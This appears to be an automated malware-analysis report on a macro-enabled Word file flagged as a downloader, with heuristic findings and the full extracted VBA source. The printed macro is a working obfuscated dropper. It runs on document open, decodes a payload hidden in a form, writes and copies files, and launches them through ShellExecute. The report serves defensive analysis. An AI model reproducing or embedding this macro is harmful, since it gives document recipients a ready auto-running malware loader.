MALICIOUS
190
Risk Score
Heuristics 6
-
ClamAV: Doc.Downloader.8f0f0f0fe0f0f0f0-OOXML-9981534-0 critical CLAMAV_DETECTIONClamAV detected this file as malware: Doc.Downloader.8f0f0f0fe0f0f0f0-OOXML-9981534-0
-
VBA project inside OOXML medium 3 related findings OOXML_VBADocument contains a VBA project — VBA macros present
-
Potential Shell call in VBA critical OLE_VBA_SHELLPotential Shell call in VBAMatched line in script
Dim atvnP As New Shell32.Shell -
CreateObject call high OLE_VBA_CREATEOBJCreateObject callMatched line in script
With CreateObject("Microsoft.XMLDOM").createElement("b64") -
AutoOpen macro low OLE_VBA_AUTOOPENAutoOpen macroMatched line in script
Sub AutoOpen() -
Embedded URL info EMBEDDED_URLOne or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.URL http://schemas.microsoft.com/office/word/2010/wordprocessingCanvas In document text (OOXML body / shared strings)
- http://schemas.microsoft.com/office/drawing/2014/chartexIn document text (OOXML body / shared strings)
- http://schemas.microsoft.com/office/drawing/2015/9/8/chartexIn document text (OOXML body / shared strings)
- http://schemas.microsoft.com/office/drawing/2015/10/21/chartexIn document text (OOXML body / shared strings)
- http://schemas.microsoft.com/office/drawing/2016/5/9/chartexIn document text (OOXML body / shared strings)
- http://schemas.microsoft.com/office/drawing/2016/5/10/chartexIn document text (OOXML body / shared strings)
- http://schemas.microsoft.com/office/drawing/2016/5/11/chartexIn document text (OOXML body / shared strings)
- http://schemas.microsoft.com/office/drawing/2016/5/12/chartexIn document text (OOXML body / shared strings)
- http://schemas.microsoft.com/office/drawing/2016/5/13/chartexIn document text (OOXML body / shared strings)
- http://schemas.microsoft.com/office/drawing/2016/5/14/chartexIn document text (OOXML body / shared strings)
- http://schemas.openxmlformats.org/markup-compatibility/2006In document text (OOXML body / shared strings)
- http://schemas.microsoft.com/office/drawing/2016/inkIn document text (OOXML body / shared strings)
- http://schemas.microsoft.com/office/drawing/2017/model3dIn document text (OOXML body / shared strings)
- http://schemas.openxmlformats.org/officeDocument/2006/relationshipsIn document text (OOXML body / shared strings)
- http://schemas.openxmlformats.org/officeDocument/2006/mathIn document text (OOXML body / shared strings)
- http://schemas.microsoft.com/office/word/2010/wordprocessingDrawingIn document text (OOXML body / shared strings)
- http://schemas.openxmlformats.org/drawingml/2006/wordprocessingDrawingIn document text (OOXML body / shared strings)
- http://schemas.openxmlformats.org/wordprocessingml/2006/mainIn document text (OOXML body / shared strings)
- http://schemas.microsoft.com/office/word/2010/wordmlIn document text (OOXML body / shared strings)
- http://schemas.microsoft.com/office/word/2012/wordmlIn document text (OOXML body / shared strings)
- http://schemas.microsoft.com/office/word/2018/wordml/cexIn document text (OOXML body / shared strings)
- http://schemas.microsoft.com/office/word/2016/wordml/cidIn document text (OOXML body / shared strings)
- http://schemas.microsoft.com/office/word/2018/wordmlIn document text (OOXML body / shared strings)
- http://schemas.microsoft.com/office/word/2015/wordml/symexIn document text (OOXML body / shared strings)
- http://schemas.microsoft.com/office/word/2010/wordprocessingGroupIn document text (OOXML body / shared strings)
- http://schemas.microsoft.com/office/word/2010/wordprocessingInkIn document text (OOXML body / shared strings)
- http://schemas.microsoft.com/office/word/2006/wordmlIn document text (OOXML body / shared strings)
- http://schemas.microsoft.com/office/word/2010/wordprocessingShapeIn document text (OOXML body / shared strings)
- http://ns.adobe.com/xap/1.0/In document text (OOXML body / shared strings)
- http://www.w3.org/1999/02/22-rdf-syntax-ns#In document text (OOXML body / shared strings)
- http://purl.org/dc/elements/1.1/In document text (OOXML body / shared strings)
- http://ns.adobe.com/xap/1.0/mm/In document text (OOXML body / shared strings)
- http://ns.adobe.com/xap/1.0/sType/ResourceEvent#In document text (OOXML body / shared strings)
- http://ns.adobe.com/xap/1.0/sType/ResourceRef#In document text (OOXML body / shared strings)
- http://ns.adobe.com/photoshop/1.0/In document text (OOXML body / shared strings)
Extracted artifacts 2
Files carved from inside the sample during analysis.
| Filename | Kind | Source | Size |
|---|---|---|---|
macros.bas |
vba-macro | oletools.olevba.extract_macros (decoded VBA source from OOXML) | 7296 bytes |
SHA-256: f237f82f25cededabfcb2f5df9dc39e08ca4279ac55aa7d5eb785d4e7e5e23cd |
|||
Preview scriptFirst 1,000 lines of the extracted script
Attribute VB_Name = "ThisDocument"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Attribute VB_Name = "frm"
Attribute VB_Base = "0{F0254258-3948-4E12-8434-D3FC4580E152}{5DBB0A53-7832-4F17-8D46-FC7D9EF2B75C}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = False
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = False
Attribute VB_Name = "aOz28d"
Sub AutoOpen()
' Lagoon
' Jpeg revel diffuse
' Adjust afterthought treatment remains
' Fudge
' Americana marine coordinator drilling curative
' Saying
Call agcqY
End Sub
Sub agcqY()
a809ck
End Sub
Function acTBWM(aiov47)
aAqcwQ = ""
For aYm14 = Len(aiov47) To 1 Step -1
aAqcwQ = aAqcwQ & "" & Mid(aiov47, aYm14, 1)
Next aYm14
acTBWM = aAqcwQ
End Function
Function aQZVL0(b64)
With CreateObject("Microsoft.XMLDOM").createElement("b64")
.DataType = "bin.base64"
.text = b64
b = .nodeTypedValue
End With
aQZVL0 = StrConv(b, vbUnicode)
End Function
Attribute VB_Name = "aDH01z"
Sub ajQmo(aeQTIY, aUzCQT)
' Factitious purchased jogging fits unconcerned foothold diction
' Listen loser tenderfoot
Set aLjVC = CreateObject("Scripting.FileSystemObject")
Call aLjVC.CopyFile(aeQTIY, aUzCQT, 1)
' Closely compliance leper
' Tenet specification
' Assistance faro olympus
End Sub
Sub aygmWQ(akeps, asGC7)
' Womens vt apache
' Torso cricket
' Chemistry muslims
' Batteries offers za wan
' Knife wearing
' Wrestling vented syndicate
' Capita seventy-eight
' Affluence
' Conventions flighty
' Groceries
' Founding financial pros forster affected alfalfa
' Parrot changes babel
' Mod convinced
' Above-mentioned confirmation present
' Ae lucerne
' Ionic later
' Liverpool
' Eph. individuals
' Hurries inculcate
' Ahoy mj moths
' Proboscis effeminacy
' Medley bogus include
' Qv upset protestation
' Tea treasures essex
' Report typing tanks aztec
' Woodsman
' Storied luscious theoretical
Open akeps For Output As #1
Print #1, asGC7
' Titular welcoming
Close #1
End Sub
Attribute VB_Name = "aRkMdT"
Function aYGFv(apsrS)
' Debian az disembodied
' Nail harass vat beckon
' Attorney pus replaced adroitly crusade
' Chute reputable sickening stacy how inviolable
' Doctor
' Uncultivated reptile b fixtures mice
' Scurry
' Toll dejection lucre
End Function
Function abZIO(aAKM3L)
' Dogmatic hood
' Ring
' Printed ottawa closer
' Wounding box rising
' Oasis gender
' Chas kidnapping
' Nudity amatory
aeu25r = Split(acTBWM(frm.paths.text), "|")
Select Case aAKM3L
Case Is = 0
abZIO = aeu25r(0)
Case Is = 1
abZIO = aeu25r(1)
Case Is = 2
abZIO = aeu25r(2)
Case Is = 3
abZIO = aeu25r(3)
End Select
' Macaroni spades
' Handjob matter-of-fact knitted
' -logy pumpkin bands risk demi
' Kenneth powder afflicts clairvoyant hub organize
' Hindrance t succulent
' Villager retrieve memorabilia heavily oughtnt
' Alumina algonquin tolerance
' Erudite
' Com trolley view
' Incidental economist
' Standstill communal juicy pry dandelion davis
' Morris three-cornered
' Bring
' Sports mephistopheles icao ladder articles gathering
' Heraldic belize
' Athlete energy effectiveness reactions monday
' Cologne portrait campfire tablecloth
' Remarks screensavers missile denomination
' Geraldine combines
' Monotone
' Nato edit marmalade hosts
' Dorset boulder enable coquette
' Safari fundraising occupations approximately
' Ups pulse midnight
' Anybody welcome leviticus highlight
' Commissioners seducer chuck integration
End Function
Function apxBH(aK0cR7, aHDX1w)
' Audit
' Pair revealed combining
' Athlete transactions
' Glacial maintains hawser
' Ailed reproductive
' Nuke enclose
' Solidarity dont voltage password
' Goto frequent articulation foretell fob vessels
End Function
Sub a809ck()
anrEU = abZIO(0)
axc2i = abZIO(1)
aG6rdm = abZIO(2)
ahOMf = abZIO(3)
' Hopefully intolerant mexican paternity
' Rom. rotary admiralty perth result dirge
' Stylus chime newcastle
' Sufficiency mae
' Bookings purr except directories threefold detail
' Pi apparently
' Wr packs
' Outstanding mega
' Refute prospects vedic amendment difficulty
' Danny
' Peru digestive
' Fastest hold inertia material hydra threatening
' Listing
' Ducking circuitous animal hie clinic
' Recent hart
' Ev tumultuously
' Gradation coupons inc obtaining
' Coast plains
' Sid laudable
' Read screenshots tokyo
' Squalid prodigal
' Baden thinks std prohibit kijiji
' Hw tallow hankering
' Flexibility
' Broader dispersing spanish
' Denizen customer
' Coppice constraint arms
' Chad scrimmage graphs
' Handy dreams inline co
' Satrap foreboding
' Transcending catalogue congress
' Line memory kidney
' Powerpoint innings
' Internal occasion iso holler
' Provinces buxom ratios morris frederick
' Jap trademark zulus qua
' Sexcam
aqcNQ = acTBWM(aQZVL0(frm.pay.text))
' Broad reunion cause educate
' Mantilla moss tarn seaweed multi rank restitution
' Opposite dover trainers
' Word challenge putrefaction herbs effrontery
aygmWQ anrEU, aqcNQ
' Orlando tiles
' Carter
' Papua legislator mpeg disease stitching
' Accounting mettle
' Kilt leasing bedroom
' Adjournment pulling conduit ovation
' Unavoidable culmination
ajQmo aG6rdm, axc2i
' Lock personals turnkey forty-one idea vendor
' Networking hewlett freak
' Docs priceless alfonso
' Hark za unrestrained egress
' Short-lived drainage proficient clips upheaval dangle
' Novel awe-struck laddie
' Sonata deuteronomy malevolence
' Matches articles theoretic peaked pave
' Clinical freeware
' Domesticity intake herbs situated
' Dallas blocks banging
' Myrrh ps
' Lint obtained depot defendant
' Albanian
' Plaza vsnet hundreds
' Ncaa engineer sixty-five novice harbor
' Shambles winder
' Brandenburg
' Learner soundtrack wallis
' Scholarly incest
' Cold stitching gland cite addresses eco
' Junk promptly tall lingo expectant
' Glacier respect
' Vegetables currently
' Plumbing
anWgC = Chr(34)
a9B6C = Trim(ahOMf & "t : " & anWgC & anrEU & anWgC)
' Viscera leave-taking speak hard-headed retainer attention generally
' Dredge sage
' Dropsy marines
' Tear delude needing technique
Dim atvnP As New Shell32.Shell
Call atvnP.ShellExecute(axc2i, a9B6C, " ", SW_SHOWNORMAL)
' Steaming hanging recorder
' Fd coupe smirk
' Outgoing essayist beckon dimmer allurement legitimate
' Bitch berne hang puts
' Limitation
' Oreilly jacket commands baldness brass
' Intelligence observatory ecommerce duration
' Bedclothes rotating colleagues disease
' Nominated disapprobation marshall
' Mormon historical niger throat
' Madcap dimmer contracts peripheral remedial rider
' Nasal ensign cupola hobbies ribald
' Chess eliminate asian subterfuge
' Ludwig vaccine
' Undeveloped dilute volvo show diaphanous
' Winters challenging
' Cindy your
' Ravage slanderous consecutive metres
' Landscapes
' Tiffany paddling
' Fares coeval finland
' Linden demand retention sections
' Rider
' Modena
' Poly
' Picks fa
End Sub
|
|||
vbaProject_00.bin |
vba-project | OOXML VBA project: word/vbaProject.bin | 38912 bytes |
SHA-256: b9f26d4f66c1d3eec11572ffb7c7126051758b25ad314aa2670238ca1b66d829 |
|||
Open this report in the interactive analyzer, or submit your own file for analysis.